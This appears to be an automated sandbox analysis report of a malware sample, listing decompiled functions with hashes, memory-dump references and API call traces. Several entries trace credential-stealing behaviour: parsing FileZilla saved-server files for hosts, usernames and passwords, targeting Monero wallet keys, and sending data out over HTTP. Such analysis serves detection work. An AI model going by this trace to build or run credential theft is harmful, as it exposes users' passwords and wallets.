                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 0f3308ab198e0839f8c5aab4b90b87f8d4393a9e366739aa0c3d42c80e22a8b2
                                  • Instruction ID: 590c53044220d837043fa902883ea980411b045495a04cf848f1661c963240be
                                  • Opcode Fuzzy Hash: 0f3308ab198e0839f8c5aab4b90b87f8d4393a9e366739aa0c3d42c80e22a8b2
                                  • Instruction Fuzzy Hash: 7111CCB8A00209DFDB04DF94D985AAEB7B9FF89304F104568E91597350D770AE51CF61
                                  Function 0060C147 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5&Z
                                  • API String ID: 0-826240325
                                  • Opcode ID: 1c31be5b592f2ff6c01ecfa89584e70236903a0293b91501e241aa949522bf55
                                  • Instruction ID: 42c923f4da0cba2361d610cf2bd1b41a533ba47ea6592428eff5ccaca261ce52
                                  • Opcode Fuzzy Hash: 1c31be5b592f2ff6c01ecfa89584e70236903a0293b91501e241aa949522bf55
                                  • Instruction Fuzzy Hash: 9BD1F5F39082149BE3107E29DC4576AFBE9EF98720F1B452DEAC493340E93568158BD7
                                  Function 00502D92 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: M)]
                                  • API String ID: 0-3397050523
                                  • Opcode ID: bccfb8dfbed9d02f07a0b63088f66a23f51e4f310290fff9596114f6d6b3728c
                                  • Instruction ID: 3edcda0fe92a0439c097af0717629165797017fd4901c0b5bf7e6db8285ca28b
                                  • Opcode Fuzzy Hash: bccfb8dfbed9d02f07a0b63088f66a23f51e4f310290fff9596114f6d6b3728c
                                  • Instruction Fuzzy Hash: F36147F3A082109FE314AE5ADC8136BB7D9DF94720F1A853DEAC4D3744EA79580087D6
                                  Function 00718E17 Relevance: .3, Instructions: 347COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73743124bcec7b1823be59507e84ed5a1396e6114acae240b25cd351eac4f9b4
                                  • Instruction ID: 90de0d359a9a568ce5eda410a1d2b00a9647327279b23118b6a9745fdeb4abc7
                                  • Opcode Fuzzy Hash: 73743124bcec7b1823be59507e84ed5a1396e6114acae240b25cd351eac4f9b4
                                  • Instruction Fuzzy Hash: 83B18EF3A042109FE7148E1CEC857ABB7D5EF58720F29453DDAC9D3780E63A98418796
                                  Function 00683BC1 Relevance: .2, Instructions: 219COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d83b425242d520ecb14da747347d40b6955fe28bc0522a88b2da4b6bc8420bcb
                                  • Instruction ID: 7a9177bd6b886bd0cfe442e1e727a9182a9dfdafef9d3e18fb39feb6c54b6477
                                  • Opcode Fuzzy Hash: d83b425242d520ecb14da747347d40b6955fe28bc0522a88b2da4b6bc8420bcb
                                  • Instruction Fuzzy Hash: 35612AB250C210EFD304BE19DD8567BB7E7EF84B10F258A2DE6C297704E2315A429783
                                  Function 00520439 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b025a6b6d369ea65981be0b758f74bd7185d62219f500135eb94683c95f58bbd
                                  • Instruction ID: e112adcf4c654e6181430aa6762fb6fa6dd09951869d2f54901f958e00305623
                                  • Opcode Fuzzy Hash: b025a6b6d369ea65981be0b758f74bd7185d62219f500135eb94683c95f58bbd
                                  • Instruction Fuzzy Hash: EF4146F3E487148FE3086E28DC8436AF3E5EB94720F2B063DDAC987780D97958418786
                                  Function 006B0996 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c11c02784eaf5cc06a7e11935a4579317f732b1bd78c362719e7e2796568d11b
                                  • Instruction ID: 7d424379a747c1ed619b3bf7d9e1503fd0b29fa2290d6e163a9c30a17e3ae2ba
                                  • Opcode Fuzzy Hash: c11c02784eaf5cc06a7e11935a4579317f732b1bd78c362719e7e2796568d11b
                                  • Instruction Fuzzy Hash: 0C3169B251C304AFE749AF29D88267EFBE5FF58350F168D2DE2C5C2660E2359440CA57
                                  Function 006A4C08 Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18c4f9fb5e0ccad51b3ef2d759728d95341b1e2e74178417e57466cc843b7d12
                                  • Instruction ID: b37702d64b14b490fe1a5c16193c9385f041ec0ae585e05b169db9fe78059432
                                  • Opcode Fuzzy Hash: 18c4f9fb5e0ccad51b3ef2d759728d95341b1e2e74178417e57466cc843b7d12
                                  • Instruction Fuzzy Hash: D0310CB240C704AFD345BF29D882A6AFBE4FF58710F06892DE2D582610E3759481CB93
                                  Function 00249750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00240250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00250DBA,00250DB7,00250DB6,00250DB3), ref: 00240362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00240369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00240385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002403CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 002403DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00240419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00240463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 00240532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00240562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00240571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00240580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00240593
                                  • lstrcat.KERNEL32(?,00251678), ref: 002405A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 002405B5
                                  • lstrcat.KERNEL32(?,0025167C), ref: 002405C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 002405D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 002405E6
                                  • lstrcat.KERNEL32(?,00251688), ref: 002405F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00240604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00240617
                                  • lstrcat.KERNEL32(?,00251698), ref: 00240626
                                  • lstrcat.KERNEL32(?,0025169C), ref: 00240635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00250DB2), ref: 0024068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: d0fc8b7039e49e3eb9ce6a54e880583f1332c76e2a785340e5db4e4a03137c50
                                  • Instruction ID: fc0b72bd097b3bc883d825dcc3ea4f45936495c3e45e3dd5631ecf62603211f3
                                  • Opcode Fuzzy Hash: d0fc8b7039e49e3eb9ce6a54e880583f1332c76e2a785340e5db4e4a03137c50
                                  • Instruction Fuzzy Hash: 4CD13F72960108ABDB08FBF0DD96EEE733CEF54301F404518F506A6091DE74AA6ACF66
                                  Function 00235960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002359F8
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00235A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00235B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0104FBC0,00000000,?,0104E830,00000000,?,00251A1C), ref: 00235E71
                                  • lstrlen.KERNEL32(00000000), ref: 00235E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00235E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00235E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00235EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00235ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00235EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00235F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00235F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00235F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FBD
                                  • HttpOpenRequestA.WININET(00000000,0104FD20,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00235BF8
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00235FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
